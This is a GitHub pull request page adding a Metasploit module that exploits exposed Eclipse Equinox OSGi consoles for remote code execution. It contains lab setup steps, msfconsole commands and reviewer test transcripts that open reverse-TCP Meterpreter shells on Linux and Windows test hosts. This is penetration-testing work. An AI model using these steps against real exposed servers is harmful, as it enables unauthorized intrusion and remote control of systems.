Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module for Eclipse Equinoxe OSGi console RCE. #9554

Merged
merged 7 commits into from Mar 7, 2018

Conversation

Projects
None yet
5 participants
@QKaiser
Copy link
Contributor

commented Feb 13, 2018

Vulnerable Application

Description

This module takes advantage of OSGi consoles exposed by some Java-based middleware servers.

The OSGi console is a telnet-based server that can be used for remote debugging and dynamic loading/removal of Java bundles running on an OSGi based server.

References

Test setup

Linux environment

Follow these steps to run the vulnerable application on a Linux host:

  1. Create a test environment directory
    mkdir testenv && cd testenv
  2. Download the setup script
    wget https://gist.githubusercontent.com/QKaiser/66c8a618eef2a7801c0bbb1aa43d724a/raw/e098f6ea31717311bd6ce5b3be94744dddfc2388/setup.sh
  3. Set appropriate permission
    chmod +x setup.sh
  4. Execute setup script
    ./setup.sh
  5. Launch the vulnerable application with this command so it listens on port TCP/5555
    java -jar org.eclipse.osgi.jar -console 5555
  6. Verify that the server is running, you should be prompted with osgi>
    telnet localhost 5555
  7. From the telnet console, enable the second second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if attacker machine is on another host.
    telnetd --ip=127.0.0.1 start

Windows environment

Follow these steps to run the vulnerable application on a Windows host:

  1. Download the Eclipse Equinoxe SDK from https://www.eclipse.org/downloads/download.php?file=/equinox/drops/R-Oxygen.2-201711300510/equinox-SDK-Oxygen.2.zip&r=1
  2. Create a test directory. Let's name it osgi_test for clarity.
  3. Create a directory named configuration in osgi_test
  4. Create a file named config.ini in your configuration directory. The file should contain the following lines only:
osgi.bundles=org.eclipse.equinox.console@start, org.apache.felix.gogo.command@start, org.apache.felix.gogo.shell@start, org.apache.felix.gogo.runtime@start
eclipse.ignoreApp=true
osgi.noShutdown=true
  1. Create an empty plugins directory in osgi_test directory
  2. Extract plugins/org.apache.felix.gogo.command_(version).jar from the SDK as org.apache.felix.gogo.command.jar in osgi_test directory.
  3. Extract plugins/org.apache.felix.gogo.runtime_(version).jar from the SDK as org.apache.felix.gogo.runtime.jar in osgi_test directory.
  4. Extract plugins/org.apache.felix.gogo.shell_(version).jar from the SDK as org.apache.felix.gogo.shell.jar in osgi_test directory.
  5. Extract plugins/org.eclipse.equinox.console_(version).jar from the SDK as org.eclipse.equinox.console.jar in osgi_test directory.
  6. Extract plugins/org.eclipse.osgi_(version).jar from the SDK as org.eclipse.osgi.jar in osgi_test directory.
  7. At the end of those steps, your osgi_test directory should contain the following items:
.
├── configuration
│   └── config.ini
├── org.apache.felix.gogo.command.jar
├── org.apache.felix.gogo.runtime.jar
├── org.apache.felix.gogo.shell.jar
├── org.eclipse.equinox.console.jar
├── org.eclipse.osgi.jar
└── plugins
  1. Launch the vulnerable application with this command so it listens on port TCP/5555
    java -jar org.eclipse.osgi.jar -console 5555
  2. Verify that the server is running, you should be prompted with osgi>
    telnet localhost 5555
  3. From the telnet console, enable the second second server. This one listens on port 2019 by default. Set the IP to an address linked to an external interface if attacker machine is on another host.
    telnetd --ip=127.0.0.1 start

If you don't want to go through all those steps manually I recommend you to run the setup script on a Linux host, mount the directory on a Windows VM and start from step 11.

Verification Steps

You can verify the module against the vulnerable application with those steps:

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/misc/osgi_console_exec
  4. Do: set RHOST 127.0.0.1
  5. Do: set RPORT 5555 or set RPORT 2019
  6. Do: check. The target should appear vulnerable.
  7. Do: set payload with the payload of your choosing.
  8. Do: run
  9. You should get a shell.

Options

TIME_WAIT - Time to wait for payload to be executed. The default value is set to 20 seconds.

Scenarios

Reverse shell on Linux host

Exploit running against a Ubuntu Linux target:

msf5 > use exploit/multi/misc/osgi_console_exec 
msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.4
msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 0
msf5 exploit(multi/misc/osgi_console_exec) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2
msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 172.20.10.2:4444 
[*] 172.20.10.4:5555 - Accessing the OSGi console ...
[*] 172.20.10.4:5555 - Exploiting...
[*] Sending stage (857352 bytes) to 172.20.10.4
[*] 172.20.10.4:5555 - 172.20.10.4:5555 - Waiting for session...
[*] Meterpreter session 2 opened (172.20.10.2:4444 -> 172.20.10.4:39314) at 2018-02-14 19:17:39 +0100
[*] 172.20.10.4:5555 - Command Stager progress - 100.00% done (763/763 bytes)

msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > sysinfo
Computer     : 172.20.10.4
OS           : Ubuntu 16.04 (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Reverse shell on Windows host

Exploit running against a Windows 7 target:

msf5 > use exploit/multi/misc/osgi_console_exec 
msf5 exploit(multi/misc/osgi_console_exec) > set RHOST 172.20.10.3
msf5 exploit(multi/misc/osgi_console_exec) > set RPORT 5555
msf5 exploit(multi/misc/osgi_console_exec) > set TARGET 1
msf5 exploit(multi/misc/osgi_console_exec) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/osgi_console_exec) > set LHOST 172.20.10.2
msf5 exploit(multi/misc/osgi_console_exec) > set LPORT 4444
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 2.
[*] Started reverse TCP handler on 172.20.10.2:4444 
[*] 172.20.10.3:5555 - Accessing the OSGi console ...
[*] 172.20.10.3:5555 - Exploiting...
[*] 172.20.10.3:5555 - 172.20.10.3:5555 - Waiting for session...
[*] Sending stage (179779 bytes) to 172.20.10.3
[*] Meterpreter session 1 opened (172.20.10.2:4444 -> 172.20.10.3:49365) at 2018-02-14 19:14:15 +0100
msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : PENTEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

If you happen to know a good bypass to feed command stager to getRuntime().exec() without relying on the presence of bash let me know :)

@QKaiser QKaiser changed the title Eclipse Equinoxe OSGi console remote command execution. Add module for Eclipse Equinoxe OSGi console RCE. Feb 13, 2018

@h00die

This comment has been minimized.

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Feb 14, 2018

Edited documentation by following the template. Let me know if something is missing or unclear.

@sempervictus
Copy link
Contributor

left a comment

Thank you foe the pr. Any chance the hex strings could be expanded or commented up a bit? Its rather opaque ATM.

@sempervictus

This comment has been minimized.

Copy link
Contributor

commented on e86169c Feb 16, 2018

Thank you very much.
Is there a protocol library that can generate these bytes in any language (just to reference structures and such)?

@h00die

This comment has been minimized.

Copy link
Contributor

commented Feb 16, 2018

Did you forget to add the docs to this PR? I still only see one file.

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Feb 17, 2018

Fixed missing documentation file.

Follow these steps to run the vulnerable application on a Linux host:

1. Create a test environment directory
``mkdir testenv && cd testenv``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

single ticks here

1. Create a test environment directory
``mkdir testenv && cd testenv``
2. Download the setup script
``wget https://gist.githubusercontent.com/QKaiser/66c8a618eef2a7801c0bbb1aa43d724a/raw/e098f6ea31717311bd6ce5b3be94744dddfc2388/setup.sh``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

single ticks here

3. Set appropriate permission
`chmod +x setup.sh`
4. Execute setup script
``./setup.sh``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

single ticks here

4. Execute setup script
``./setup.sh``
5. Launch the vulnerable application with this command so it listens on port TCP/5555
``java -jar org.eclipse.osgi.jar -console 5555``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

single ticks here

5. Launch the vulnerable application with this command so it listens on port TCP/5555
``java -jar org.eclipse.osgi.jar -console 5555``
6. Verify that the server is running, you should be prompted with `osgi> `
``telnet localhost 5555``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

single or triple ticks here


Exploit running against a Ubuntu Linux target:

``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

triple ticks

BuildTuple : i486-linux-musl
Meterpreter : x86/linux
``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

triple ticks

Exploit running against a Windows 7 target:
``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

triple ticks

Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
``

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

triple ticks

``
## References

This comment has been minimized.

Copy link
@h00die

h00die Feb 17, 2018

Contributor

I would actually remove this section and move it up to the description area.

@h00die

This comment has been minimized.

Copy link
Contributor

commented Feb 17, 2018

docs look really good overall, a bunch of nit picks. well done!

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Feb 17, 2018

@sempervictus regarding protocol library, Msf::Exploit::Remote::Telnet is not modular enough for this specific use case. It works when connecting to OSGi console if it runs in "telnetd mode" but not in "direct mode" where this weird IAC terminal type exchange happen.

What I could do though is use IAC constants from Msf::Exploit::Remote::Telnet such as OPT_TTYPE in the module code so it's more readable than a bunch of hex bytes.

@QKaiser

This comment has been minimized.

Copy link
Contributor Author

commented Feb 17, 2018

@sempervictus I took a shot at using Msf::Exploit::Remote::Telnet constants. Let me know what you think.

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Mar 7, 2018

@jrobles-r7 jrobles-r7 self-assigned this Mar 7, 2018

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 7, 2018

OSGI Console on Debian 9.3 x64

msf5 > use exploit/multi/misc/osgi_console_exec
msf5 exploit(multi/misc/osgi_console_exec) > set rhost 172.22.222.135
rhost => 172.22.222.135
msf5 exploit(multi/misc/osgi_console_exec) > set rport 5555
rport => 5555
msf5 exploit(multi/misc/osgi_console_exec) > check
[+] 172.22.222.135:5555 The target is vulnerable.
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/osgi_console_exec) > 
[*] Started reverse TCP handler on 172.22.222.131:4444 
[*] 172.22.222.135:5555 - Accessing the OSGi console ...
[*] 172.22.222.135:5555 - Exploiting...
[*] Sending stage (857352 bytes) to 172.22.222.135
[*] 172.22.222.135:5555 - Command Stager progress - 100.00% done (763/763 bytes)

msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : test-deb.test-dom
OS           : Debian 9.3 (Linux 4.9.0-6-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

OSGI Console on Windows 7 SP1 x64

msf5 > use exploit/multi/misc/osgi_console_exec
msf5 exploit(multi/misc/osgi_console_exec) > set rhost 172.22.222.122
rhost => 172.22.222.122
msf5 exploit(multi/misc/osgi_console_exec) > set rport 5555
rport => 5555
msf5 exploit(multi/misc/osgi_console_exec) > set target 1 
target => 1
msf5 exploit(multi/misc/osgi_console_exec) > check
[+] 172.22.222.122:5555 The target is vulnerable.
msf5 exploit(multi/misc/osgi_console_exec) > run
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/osgi_console_exec) > 
[*] Started reverse TCP handler on 172.22.222.131:4444 
[*] 172.22.222.122:5555 - Accessing the OSGi console ...
[*] 172.22.222.122:5555 - Exploiting...
[*] 172.22.222.122:5555 - 172.22.222.122:5555 - Waiting for session...
[*] Sending stage (179779 bytes) to 172.22.222.122

msf5 exploit(multi/misc/osgi_console_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-V438RLMESAE\pwnduser
meterpreter > sysinfo
Computer        : WIN-V438RLMESAE
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

@jrobles-r7 jrobles-r7 merged commit 9e3f126 into rapid7:master Mar 7, 2018

1 of 2 checks passed

Metasploit Automation - Sanity Test Execution Running sanity checks.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Mar 7, 2018

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 7, 2018

Release Notes

The exploit/multi/misc/osgi_console_exec module has been added to framework. It uses the fork command of exposed OSGi consoles to execute code on vulnerable servers.

msjenkins-r7 added a commit that referenced this pull request Mar 7, 2018

@tdoan-r7 tdoan-r7 added the rn-exploit label Mar 14, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.